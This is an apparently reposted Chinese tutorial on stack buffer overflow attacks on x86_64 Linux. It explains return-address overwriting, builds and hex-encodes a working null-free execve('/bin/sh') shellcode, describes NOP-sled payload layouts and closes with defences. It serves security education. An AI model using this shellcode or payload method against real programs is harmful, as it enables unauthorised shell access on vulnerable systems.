緩沖區溢出(棧溢出)


前言

在現在的網絡攻擊中,緩沖區溢出方式的攻擊占據了很大一部分,緩沖區溢出是一種非常普遍的漏洞,但同時,它也是非常危險的一種漏洞,輕則導致系統宕機,重則可導致攻擊者獲取系統權限,進而盜取數據,為所欲為。

其實緩沖區攻擊說來也簡單,請看下面一段代碼:

int main(int argc, char *argv[]) {
    char buffer[8];
    if(argc > 1) strcpy(buffer, argv[1]);
    return 0;
}

當我們在對argv[1]進行拷貝操作時,並沒對其長度進行檢查,這時候攻擊者便可以通過拷貝一個長度大於8的字符串來覆蓋程序的返回地址,讓程序轉而去執行攻擊代碼,進而使得系統被攻擊。

本篇主要講述緩沖區溢出攻擊的基本原理,我會從程序是如何利用棧這種數據結構來進行運行的開始,試着編寫一個shellcode,然后用該shellcode來溢出我們的程序來進行說明。我們所要使用的系統環境為x86_64 Linux,我們還要用到gcc(v7.4.0)、gdb(v8.1.0)等工具,另外,我們還需要一點匯編語言的基礎,並且我們使用AT&T格式的匯編。

進程

在現代的操作系統中,進程是一個程序的運行實體,當在操作系統中運行一個程序時,操作系統會為我們的程序創建一個進程,並給我們的程序在內存中分配運行所需的空間,這些空間被稱為進程空間。進程空間主要有三部分組成:代碼段,數據段和棧段。如下圖所示:

棧是一種后入先出的數據結構,在現代的大多數編程語言中,都使用棧這種數據結構來管理過程之間的調用。那什么又是過程之間的調用呢,說白了,一個函數或者一個方法便是一個過程,而在函數或方法內部調用另外的過程和方法便是過程間的調用。我們知道,程序的代碼是被加載到內存中,然后一條條(這里指匯編)來執行的,而且時不時的需要調用其他的函數。當一個調用過程調用一個被調用過程時,所要執行的代碼所在的內存地址是不同的,當被調用過程執行完后,又要回到調用過程繼續執行。調用過程調用被調用過程時,需要使用call指令,並在call指令后指明要調用的地址,例如call 地址,當被調用過程返回時,使用ret指令來進行返回,但是並不需要指明返回的地址。那么程序是怎么知道我們要返回到什么地方呢?這主要是棧的功勞:執行call指令時,程序會自動的將call指令的下一條指令的地址加入到棧中,我們叫做返回地址。當程序返回時,程序從棧中取出返回地址,然后使程序跳轉到返回地址處繼續執行。

另外,程序在調用另一個過程時需要傳遞的參數,以及一個過程的局部變量(包括過程中開辟的緩沖區)都要分配在棧上。可見,棧是程序運行必不可少的一種機制。

但是,聰明的你可能一想:不對,既然程序的返回地址保存在棧上,過程的參數以及局部變量也保存在棧上,我們可以在程序中操縱參數和局部變量,那么我們是否也能操作返回地址,然后直接跳轉到我們想要運行的代碼處呢?答案當然是肯定的。

改變程序的返回地址

我們看這也一個程序。

example.c
void func() {
        long *res;
        res = &res + 2;
        *res += 7;
}

int main() {
        int x = 1;
        func();
        x = 0;
        printf("%d\n", x);
}

我們在shell中使用如下命令編譯運行一下,對於gcc編譯時所用的參數,我先賣個關子。

$ `gcc -fno-stack-protector example.c -o example`
$ ./example

你或許會說:“哎呀呀,不用看了,這么簡單,運行結果是0嘛”。但結果真的是這樣嘛。其實,這個程序的運行結果是1。“什么,這怎么可能是1嘛,不得了不得了”

還記的我們提到的我們可以在程序中改變過程的返回地址嗎?在func中,看似是對res進行了一些無意義的操作,但是這實際上是改變了func的返回地址,跳過了x = 0這條賦值命令。讓我們從匯編的層面上看一下這個程序是如何執行的。

$ gdb gdb example
GNU gdb (Ubuntu 8.1-0ubuntu3) 8.1.0.20180409-git
Copyright (C) 2018 Free Software Foundation, Inc.
...
gdb-peda$ disassemble func 
Dump of assembler code for function func:
   0x000000000000064a <+0>:	push   %rbp
   0x000000000000064b <+1>:	mov    %rsp,%rbp
   0x000000000000064e <+4>:	lea    -0x8(%rbp),%rax
   0x0000000000000652 <+8>:	add    $0x10,%rax
   0x0000000000000656 <+12>:	mov    %rax,-0x8(%rbp)
   ...
   0x000000000000066e <+36>:	retq   
End of assembler dump.

在gdb中,我們使用disassemble func來查看一下func函數的匯編代碼,在這里,程序棧上的情況是這樣的,其中棧的寬度為8字節:

一看程序你也許會明白了,在4~12行(實際上這里的行應該是該條指令在該函數中第幾個字節處,這里為了方便姑且就這樣叫吧)程序取得res的地址,並將其地址加上0x10(即16),這對應程序的res = &res + 2;,此時res指向的便是返回地址所在的地址了,然后使用*res += 7來改變返回地址。至於為什么是加7而不是其他數,是因為我們的目的是跳過執行x = 0,而x = 0這條程序所占的字節數剛好為7個。我們使用disassemble main來查看一下main函數的匯編代碼。

gdb-peda$ disassemble main 
Dump of assembler code for function main:
   0x000000000000066f <+0>:	push   %rbp
   0x0000000000000670 <+1>:	mov    %rsp,%rbp
   0x0000000000000673 <+4>:	sub    $0x10,%rsp
   0x0000000000000677 <+8>:	movl   $0x1,-0x4(%rbp)
   0x000000000000067e <+15>:	mov    $0x0,%eax
   0x0000000000000683 <+20>:	callq  0x64a <func>
   0x0000000000000688 <+25>:	movl   $0x0,-0x4(%rbp)
   0x000000000000068f <+32>:	mov    -0x4(%rbp),%eax
   ...   
End of assembler dump.

上面的匯編代碼中,第25行便是x = 0這條程序的匯編指令,我們的目的是跳過它,也就是說我們要直接執行第32行處的代碼,現在返回地址是指向第25行的(還記得前面說的返回地址是call指令下一條指令的地址嗎),為了跳過它,我們給返回地址加7。

覆蓋返回地址

現在,我們大概了解了如何修改返回地址讓程序跳轉到我們指定的地方執行,但是要攻擊的程序可不是我們編寫的啊,我們只是知道程序的某個地方有個緩沖區可以讓我們往里面寫數據,我們可沒有辦法改變程序的代碼啊。這個時候,我們就要說一說關於緩沖區的拷貝這件事了。

還記的我們開頭的程序嗎?這里我們為了調試起來方便,我們給它加個輸出。

test.c
int main(int argc, char *argv[]) {
    char buffer[8];
    if(argc > 1) strcpy(buffer, argv[1]);
    printf("%s\n", buffer);
}

我們的程序在棧上的結構大概是下面這個樣子。這里將我們的棧換了個樣子

當程序對argv[1]進行拷貝操作時,依次將字符從低地址寫向高地址。當argv[1]的長度小於8時,我們的緩沖區buffer空間足夠,拷貝沒有問題可以完成,但當我們的argv[1]的過長的話,長到將返回地址都覆蓋了的話,main函數的返回地址就不知道返回到哪里去了。

讓我們來試一下:

$ gcc -fo-stack-protector  -o test test.c
$ ./test hello
hello
$ ./test helloworld
helloworld
$ ./test helloworld123456789
helloworld123456789
Segmentation fault

可以看到當我們給定的參數為helloworld123456789,我們的程序出現了段錯誤,也即是這時候,我們的返回地址被破環了,導致main函數返回時出錯。這時候的棧看起來是下面這個樣子的:

對照前面的棧結構,發現main函數的返回地址的確被破壞了。若是我們往返回地址處覆蓋一個我們想要執行的程序的地址,那是不是就可以執行我們的程序了呢?

shellcode

那么攻擊時要執行什么程序呢?一般情況下,我們想通過緩沖區溢出來獲取一個shell,一旦有了shell,我們就可以“為所欲為”了,因此我們也把這種程序叫做shellcode。那么這個shellcode在哪呢,可以確定的是,系統管理員是不會在系統中留一個shellcode的,也並不會告訴你:嘿,我這里有一個shellcode,地址是xxxx,你快把返回地址給覆蓋了,來着里執行吧。所以,這個shellcode還需要我們自己編寫,並傳到要攻擊的系統上。那要傳遞到哪呢?緩沖區不正是一個好地方嘛。

我們知道,在馮·諾伊曼架構的計算機中,數據和代碼是不加以明確區分的,也就是說,內存中某個地方的東西,它既可以看作是一個程序的數據,也可以當作代碼來執行。所以,我們大概有了一個攻擊思路:我們將我們的shellcode放在緩沖區中,然后通過覆蓋返回地址跳轉到我們shellcode處,進而執行我們的shellcode

下面,我們來討論如何編寫一個shellcode

首先,我們為了得到一個shell,需要使用第59和60號系統調用,下面是他們的系統調用表,並以C語言的方式指明了他們的參數。

%rax system call %rdi %rsi %rdx
59 sys_execve const char *filename const char *const argv[] const char* const envp[]
60 sys_exit int error_code

他們分別對應C語言中的系統函數int execve(const char *filename, char *const argv[ ], char *const envp[ ]);exit(int error_code)execve()用於在一個進程中啟動新的程序,它的第一個參數是指程序所在的路徑,第二個參數是傳遞給程序的參數,數組指針argv必須以程序filename開頭,NULL結尾,最后一個參數為傳遞程序的新環境變量。而exit()的參數指明它的退出代碼。

下面這個C語言程序便可以獲取一個shell,當在獲取的shell中輸入exit時便可退出shell,且退出代碼為0。

#include <stdio.h>

int main() {
    char *name[2];
    name[0] = "/bin/sh";
    name[1] = NULL;
    execve(name[0], name, NULL);
    exit(0);
}

現在,讓我們從匯編的角度思考一下,該如何編寫一個和上面這個程序功能相似的shellcode。

  1. 首先,我們需要一個字符串"/bin/sh",並且需要知道它的確切地址
  2. 然后,我們需要將參數傳遞給相應的寄存器
  3. 最后,調用系統調用。

如何方便的獲取到一個字符串的地址呢?一種方法是將字符串放到一個call指令的后面,這樣,當這個call指令執行的時候,該字符串的首地址便被加入到棧中。 好了,我不再繞彎子了,下面給出一個shellcode

jmp mycall
func: pop %rbx
mov %rbx, 0x8(%rsp)
movb $0x0, 0x7(%rsp)
movl $0x0, 0x10(%rsp)
mov $59, %rax
mov %rbx, %rdi
lea 0x8(%rsp), %rsi
lea 0x10(%rsp), %rdx
syscall
mov $60, %rax
mov $0, %rdi
syscall
mycall: call func
.string \"/bin/sh\"

現在,我們依次看一下每一條指令的意思。

1.  jmp mycall

        當shellcode執行時,會先執行這一條,這會使我們的程序跳轉到第14行的call指令處

2.  func: pop %rbx
        
        我們從棧中獲取返回地址,這也是字符串所在的地址

3.  mov %rbx, 0x8(%rsp)
4.  movb $0x0, 0x7(%rsp)
5.  movl $0x0, 0x10(%rsp)

        盡管我們有了字符串的地址,但是我們並沒有第二個參數和第三個參數所在的地址,所以程序在棧上構造出第二個和第三個參數

6.  mov $59, %rax
7.  mov %rbx, %rdi
8.  lea 0x8(%rsp), %rsi
9.  lea 0x10(%rsp), %rdx

        我們將參數傳遞給指定的寄存器

10. syscall

        使用syscall指令進行系統調用,這在x86 Linux中為int 0x80

11. mov $60, %rax
12. mov $0, %rdi
13. syscall

        為了使我們的shellcode在退出shell后正常退出,需要調用下exit系統調用,退出代碼為0

14. mycall: call func

15. .string \"/bin/sh\"

它們的執行流程如下圖所示:

現在,我們有了shellcode,我們先用C語言內聯匯編的方式測試一下它是否能運行。

shellcode_test.c
int main() {
    __asm__(
        "jmp mycall\n\t"
        "func: pop %rbx\n\t"
        "mov %rbx, 0x8(%rsp)\n\t"
        "movb $0x0, 0x7(%rsp)\n\t"
        "movl $0x0, 0x10(%rsp)\n\t"
        "mov $59, %rax\n\t"
        "mov %rbx, %rdi\n\t"
        "lea 0x8(%rsp), %rsi\n\t"
        "lea 0x10(%rsp), %rdx\n\t"
        "syscall\n\t"
        "mov $60, %rax\n\t"
        "mov $0, %rdi\n\t"
        "syscall\n\t"
        "mycall: call func\n\t"
        ".string \"/bin/sh\""
        );
}

試着編譯運行一下:

$ gcc shellcode_test.c -o shellcode_test
$ ./shellcode_test 
sh-4.4# exit
exit
$

Wow,我們的shellcode完全可行,但是現在還並沒有結束。眾所周知,程序在內存中都是以二進制的形式保存的,我們的程序也不例外,因為我們需要將我們的shellcode傳遞到緩沖區中去,如果直接傳遞代碼,那顯然是不行的,我們要傳遞的應該是編譯生成的二進制才對,這樣在目標機器上直接就可以執行。現在,我們使用gdb將我們的程序轉換為二進制(確切的說應該是16進制,不過都一樣嘛)

$ gdb gdb shellcode_test
....
gdb-peda$ disassemble main 
Dump of assembler code for function main:
   0x00000000000005fa <+0>:	push   %rbp
   0x00000000000005fb <+1>:	mov    %rsp,%rbp
   0x00000000000005fe <+4>:	jmp    0x639 <main+63>
   0x0000000000000600 <+6>:	pop    %rbx
   0x0000000000000601 <+7>:	mov    %rbx,0x8(%rsp)
   0x0000000000000606 <+12>:	movb   $0x0,0x7(%rsp)
   0x000000000000060b <+17>:	movl   $0x0,0x10(%rsp)
   0x0000000000000613 <+25>:	mov    $0x3b,%rax
   0x000000000000061a <+32>:	mov    %rbx,%rdi
   0x000000000000061d <+35>:	lea    0x8(%rsp),%rsi
   0x0000000000000622 <+40>:	lea    0x10(%rsp),%rdx
   0x0000000000000627 <+45>:	syscall 
   0x0000000000000629 <+47>:	mov    $0x3c,%rax
   0x0000000000000630 <+54>:	mov    $0x0,%rdi
   0x0000000000000637 <+61>:	syscall 
   0x0000000000000639 <+63>:	callq  0x600 <main+6>
   0x000000000000063e <+68>:	(bad)  
   0x000000000000063f <+69>:	(bad)  
   0x0000000000000640 <+70>:	imul   $0x90006873,0x2f(%rsi),%ebp
   0x0000000000000647 <+77>:	pop    %rbp
   0x0000000000000648 <+78>:	retq   
End of assembler dump.
gdb-peda$ x /64xb main+4
0x5fe <main+4>:	0xeb	0x39	0x5b	0x48	0x89	0x5c	0x24	0x08
0x606 <main+12>:	0xc6	0x44	0x24	0x07	0x00	0xc7	0x44	0x24
0x60e <main+20>:	0x10	0x00	0x00	0x00	0x00	0x48	0xc7	0xc0
0x616 <main+28>:	0x3b	0x00	0x00	0x00	0x48	0x89	0xdf	0x48
0x61e <main+36>:	0x8d	0x74	0x24	0x08	0x48	0x8d	0x54	0x24
0x626 <main+44>:	0x10	0x0f	0x05	0x48	0xc7	0xc0	0x3c	0x00
0x62e <main+52>:	0x00	0x00	0x48	0xc7	0xc7	0x00	0x00	0x00
0x636 <main+60>:	0x00	0x0f	0x05	0xe8	0xc2	0xff	0xff	0xff

可以看到,除了字符串以外,我們的程序是從第4行到第63行,由於字符串在內存中保存的是ascii碼,這里也就不需要獲取其二進制了。

好了,現在我們已經有了shellcode的二進制了,但是還有一個問題。可以看到,我們的程序中有0x00這種數據,由於我們的shellcode作為字符串傳遞到緩沖區中的,這代表的恰恰也是字符串的結束,也就是說,當我們的字符串往緩沖區拷貝的時候,當遇到0x00時,無論我們的shellcode有沒有拷貝完,都會停止拷貝。我們可不想我們費盡千辛萬苦寫出的shellcode竟然只被拷貝的殘缺不全。下面,我們改進一下我們的程序。

shellcode_test1.c
int main() {
    __asm__(
        "jmp mycall\n\t"
        "func: pop %rbx\n\t"
        "mov %rbx, 0x8(%rsp)\n\t"
        "xor %rax, %rax\n\t"
        "movb %al, 0x7(%rsp)\n\t"
        "movl %eax, 0x10(%rsp)\n\t"
        "movb $0x3b, %al\n\t"
        "mov %rbx, %rdi\n\t"
        "lea 0x8(%rsp), %rsi\n\t"
        "lea 0x10(%rsp), %rdx\n\t"
        "syscall\n\t"
        "xor %rdi, %rdi\n\t"
        "xor %rax, %rax\n\t"
        "movb $60, %al\n\t"
        "syscall\n\t"
        "mycall: call func\n\t"
        ".string \"/bin/sh\""
        );
}

對照shellcode_test.c,我們只是改變了一些賦值操作。讓我們看一下效果。

$ gcc shellcode_test1.c -o shellcode_test1
$ gdb shellcode_test1
...
gdb-peda$ disassemble main 
Dump of assembler code for function main:
   0x00000000000005fa <+0>:	push   %rbp
   0x00000000000005fb <+1>:	mov    %rsp,%rbp
   0x00000000000005fe <+4>:	jmp    0x62c <main+50>
   0x0000000000000600 <+6>:	pop    %rbx
   0x0000000000000601 <+7>:	mov    %rbx,0x8(%rsp)
   0x0000000000000606 <+12>:	xor    %rax,%rax
   0x0000000000000609 <+15>:	mov    %al,0x7(%rsp)
   0x000000000000060d <+19>:	mov    %eax,0x10(%rsp)
   0x0000000000000611 <+23>:	mov    $0x3b,%al
   0x0000000000000613 <+25>:	mov    %rbx,%rdi
   0x0000000000000616 <+28>:	lea    0x8(%rsp),%rsi
   0x000000000000061b <+33>:	lea    0x10(%rsp),%rdx
   0x0000000000000620 <+38>:	syscall 
   0x0000000000000622 <+40>:	xor    %rdi,%rdi
   0x0000000000000625 <+43>:	xor    %rax,%rax
   0x0000000000000628 <+46>:	mov    $0x3c,%al
   0x000000000000062a <+48>:	syscall 
   0x000000000000062c <+50>:	callq  0x600 <main+6>
   0x0000000000000631 <+55>:	(bad)  
   0x0000000000000632 <+56>:	(bad)  
   0x0000000000000633 <+57>:	imul   $0x90006873,0x2f(%rsi),%ebp
   0x000000000000063a <+64>:	pop    %rbp
   0x000000000000063b <+65>:	retq   
End of assembler dump.
gdb-peda$ x /51xb main+4
0x5fe <main+4>:	0xeb	0x2c	0x5b	0x48	0x89	0x5c	0x24	0x08
0x606 <main+12>:	0x48	0x31	0xc0	0x88	0x44	0x24	0x07	0x89
0x60e <main+20>:	0x44	0x24	0x10	0xb0	0x3b	0x48	0x89	0xdf
0x616 <main+28>:	0x48	0x8d	0x74	0x24	0x08	0x48	0x8d	0x54
0x61e <main+36>:	0x24	0x10	0x0f	0x05	0x48	0x31	0xff	0x48
0x626 <main+44>:	0x31	0xc0	0xb0	0x3c	0x0f	0x05	0xe8	0xcf
0x62e <main+52>:	0xff	0xff	0xff 

現在,我們的shellcode中已經沒有0x00了,並且還變短了呢。

現在,我們試一試這個shellcode作為字符串能否運行。

shellcode.c
#include<stdio.h>
#include<string.h>

char shellcode[] = "\xeb\x2c\x5b\x48\x89\x5c\x24\x08\x48\x31\xc0\x88\x44\x24\x07\x89\x44\x24"
                   "\x10\xb0\x3b\x48\x89\xdf\x48\x8d\x74\x24\x08\x48\x8d\x54\x24\x10\x0f\x05"
                   "\x48\x31\xff\x48\x31\xc0\xb0\x3c\x0f\x05\xe8\xcf\xff\xff\xff/bin/sh";

void test() {
    long  *ret;
    ret = (long *)&ret + 2;
    (*ret) = (long)shellcode;
}

int main() {
    test();
}
$ gcc -z execstack -fno-stack-protector -o shellcode shellcode.c
$ ./shellcode
sh-4.4# exit
exit
$

哈,完全可以運行。

使用shellcode

現在,我們已經有了shellcode,我們在前面也提供了一種攻擊思路,但是最終的困難卻在於我們該如何利用緩沖區溢出來修改返回地址,說實話,到現在為止,博主並沒有找到一個優雅的、簡單的修改返回地址的方法。在我所看的一些文章中,唯一的方法就是“試”,這當然還需要靠點運氣,更何況現在操作系統一般采用棧隨機化,並不好“試”。

一種比較好的方法是在shellcode前面加上許多nop指令,並在后面加上許多要覆蓋的返回地址。由於nop代表空指令,且只占一個字節,不管我們的返回地址返回到shellcode前面的任何一個nop,程序都會執行到shellcode所在的地方,而不必非要返回到shellcode的開頭處,這會大大增加shellcode被執行的機率。

但是,這對一些比較小的緩沖區卻並不是很適用,因為比較小的緩沖區並不能有太多了nop或者太長的shellcode,否則返回地址直接被shellcode或者甚至被nop給覆蓋了,在別處看到的是,解決這類小緩沖區的方法也很簡單,我們把返回地址放在前面,nop放在中間,shellcode放在最后面,就像這樣:

這樣理論上,nop可以很多,執行shellcode的機會也會大大增加。

防范

現代編譯器已經加入了許多防范緩沖區溢出的機制,例如緩沖區溢出檢查(還記的我前面賣的關子嗎?我們使用了gcc的-fno-stack-protector參數,就是讓編譯器不要加入這種機制,以免干擾我們的實驗。)、禁止棧內執行代碼(shellcode.c編譯時所用的-z execstack,該參數是允許棧內代碼執行)。緩沖區溢出檢查是指在棧上的局部變量分配之前,先分配一些空間保存某個數,當在程序返回之前,先檢查這個數有沒有被改變,若被改變了,則立即觸發中斷,防止去執行shellcode。另外,現代操作系統也加入了許多措施來阻止緩沖區溢出,比如棧的隨機化(這又大大降低了我們“猜”中返回地址的機率)。

但是,盡管操作系統和編譯器都加入了如此多的機制來防范緩沖區溢出,但是,攻擊者總還是有種種辦法繞過這些機制,所以,要從根本上杜絕緩沖區溢出,還是要從我們寫程序入手,在對緩沖區操作前,一定要對其操作的范圍進行限制,不要使用那些危險的函數,比如gets、不限制長度的strcpy等等。

小結

程序依靠棧來執行,並將局部變量分配在棧上,call指令也將返回地址放在棧上,這是可以進行緩沖區溢出的前提。

緩沖區溢出是通過覆蓋返回地址,進而去執行攻擊程序(shellcode)來實現的。

shellcode編寫完成后要轉換為二進制(16進制)數據,且不得出現0x00,這代表了字符串的結束

防范緩沖區溢出要使用正確的編譯選項,更重要的是正確的編寫程序。



免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM